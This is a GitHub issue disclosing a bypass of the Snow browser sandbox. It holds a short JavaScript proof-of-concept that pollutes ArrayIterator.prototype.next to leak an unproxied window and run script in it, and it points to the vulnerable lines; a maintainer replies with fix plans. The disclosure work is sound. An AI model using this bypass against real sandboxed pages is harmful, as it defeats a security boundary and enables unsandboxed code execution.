Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Snow can be bypassed with native Prototype Pollution #149

Open
terjanq opened this issue Oct 2, 2023 · 1 comment
Open

Snow can be bypassed with native Prototype Pollution #149

terjanq opened this issue Oct 2, 2023 · 1 comment

Comments

@terjanq
Copy link

terjanq commented Oct 2, 2023
edited
Loading

PoC:

// get the original ArrayIterator.prototype.next method
var next = [].values().__proto__.next;
// overwrite the method
[].values().__proto__.next = function(){
    var x = next.call(this);
    var win = x?.value;
    // leak the window reference
    if(win?.toString() === '[object Window]'){
       win.location = 'about:blank';
       setTimeout(()=>win.alert(1337), 100);
    }
    return x;
}
open().location;

Vulnerable path:

  1. from(arguments) in

    snow/src/log.js

    Line 16 in 1c8faa8

    const args = from(arguments);
  2. Passing opened window reference to console.error in

    snow/src/proxy.js

    Lines 48 to 50 in 1c8faa8

    if (Reflect.has(opened, property)) {
    throw error(ERR_OPENED_PROP_ACCESS_BLOCKED, property, opened);
    }

Description

Accessing the arguments variable inside a function scope returns an array-like object which looks like the following:

Arguments(3) [1, 2, 3, callee: ƒ abc(), length: 3, Symbol(Symbol.iterator): ƒ values(), [[Prototype]]: Object

It defines a @@iterator symbol used to generate an ArrayIterator object, which Array.from() calls internally. We can overwrite ArrayIterator.prototype.next to leak the function arguments passed to Array.from, one of which is an unproxied reference to the window that can be used to execute unsandboxed JS.
@terjanq terjanq changed the title Snow can be polluted with native Prototype Pollution Snow can be bypassed with native Prototype Pollution Oct 2, 2023
@naugtur
Copy link
Member

naugtur commented Nov 2, 2023

Thanks for contributing. The main maintainer of this project is temporary unavailable, but we'll definitely get back to this.
The plan is to tighten some limitations on DOM usage that Snow already introduces and fixing the missing overrides where possible. Some of the work has started (see PR tab)

Meanwhile we're also working with W3C to propose a basic building block of Snow getting introduced into the browser so that all of the monkey-patching can be eliminated in the future. https://www.w3.org/2023/03/secure-the-web-forward/talks/realms.html

Feel free to update this issue with comments on how you think it should be addressed. We may reach out with questions later.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@naugtur @terjanq